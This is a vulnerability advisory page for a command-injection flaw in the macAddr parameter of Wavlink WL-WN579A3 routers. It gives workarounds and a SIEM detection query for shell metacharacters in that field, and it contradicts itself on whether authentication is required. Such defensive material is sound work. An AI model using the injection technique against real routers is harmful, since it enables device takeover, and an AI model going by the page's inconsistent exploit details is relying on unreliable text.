Login Sign Up

CVE-2026-2530

6.3 MEDIUM
Remote Code Execution

📋 TL;DR

This vulnerability allows remote attackers to execute arbitrary commands on Wavlink WL-WN579A3 routers by exploiting command injection in the AddMac function. Attackers can manipulate the macAddr parameter in the wireless.cgi endpoint to run system commands. All users of affected Wavlink router versions are at risk.

💻 Affected Systems

Products:
  • Wavlink WL-WN579A3
Versions: Up to 20210219
Operating Systems: Embedded Linux
Default Config Vulnerable: ⚠️ Yes
Notes: Affects the web management interface accessible via HTTP/HTTPS. Default configurations are vulnerable.

📦 What is this software?

Wl Wn579a3 Firmware by Wavlink

View all CVEs affecting Wl Wn579a3 Firmware →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete compromise of the router allowing persistent backdoor installation, network traffic interception, lateral movement to connected devices, and botnet recruitment.

🟠

Likely Case

Router takeover enabling DNS hijacking, credential theft from network traffic, and deployment of malware to connected devices.

🟢

If Mitigated

Limited impact with proper network segmentation, firewall rules blocking WAN access to management interfaces, and regular firmware updates.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: CONFIRMED
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

Public exploit code available on GitHub. Remote exploitation requires no authentication. Simple HTTP request with crafted macAddr parameter.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Unknown

Vendor Advisory: None available

Restart Required: No

Instructions:

No official patch available. Vendor did not respond to disclosure. Consider replacing affected devices or implementing workarounds.

🔧 Temporary Workarounds

Block WAN Access to Management Interface

linux

Configure firewall to block external access to router web interface (ports 80/443)

iptables -A INPUT -p tcp --dport 80 -j DROP
iptables -A INPUT -p tcp --dport 443 -j DROP

Disable CGI Wireless Management

linux

Remove or restrict access to vulnerable /cgi-bin/wireless.cgi endpoint

mv /www/cgi-bin/wireless.cgi /www/cgi-bin/wireless.cgi.disabled

🧯 If You Can't Patch

  • Isolate affected routers in separate VLAN with strict firewall rules
  • Implement network monitoring for unusual outbound connections from routers

🔍 How to Verify

Check if Vulnerable:

Check router firmware version via web interface at System Status > Firmware Version

Check Version:

curl -s http://router-ip/ | grep -i firmware

Verify Fix Applied:

Test if /cgi-bin/wireless.cgi endpoint responds to command injection attempts

📡 Detection & Monitoring

Log Indicators:

  • HTTP requests to /cgi-bin/wireless.cgi with unusual macAddr parameters
  • System command execution in router logs

Network Indicators:

  • Unusual outbound connections from router IP
  • DNS queries to suspicious domains from router

SIEM Query:

source="router-logs" AND uri="/cgi-bin/wireless.cgi" AND (macAddr="*;*" OR macAddr="*|*" OR macAddr="*`*")

📊 Metadata

CVE ID: CVE-2026-2530
CVSS v3 Score: 6.3 (MEDIUM)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
CWE: CWE-74
Published: February 16, 2026
Last Updated: February 18, 2026

🔗 References

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2026-2530, you might also want to check these:

CVE-2026-25520 10.0

SandboxJS versions before 0.8.29 have a critical sandbox escape vulnerability that allows attackers ...

Same vulnerability type (CWE-74)
CVE-2026-25586 10.0

This CVE describes a sandbox escape vulnerability in SandboxJS library versions before 0.8.29. Attac...

Same vulnerability type (CWE-74)
CVE-2025-20281 10.0

An unauthenticated remote code execution vulnerability in Cisco ISE and ISE-PIC API allows attackers...

Same vulnerability type (CWE-74)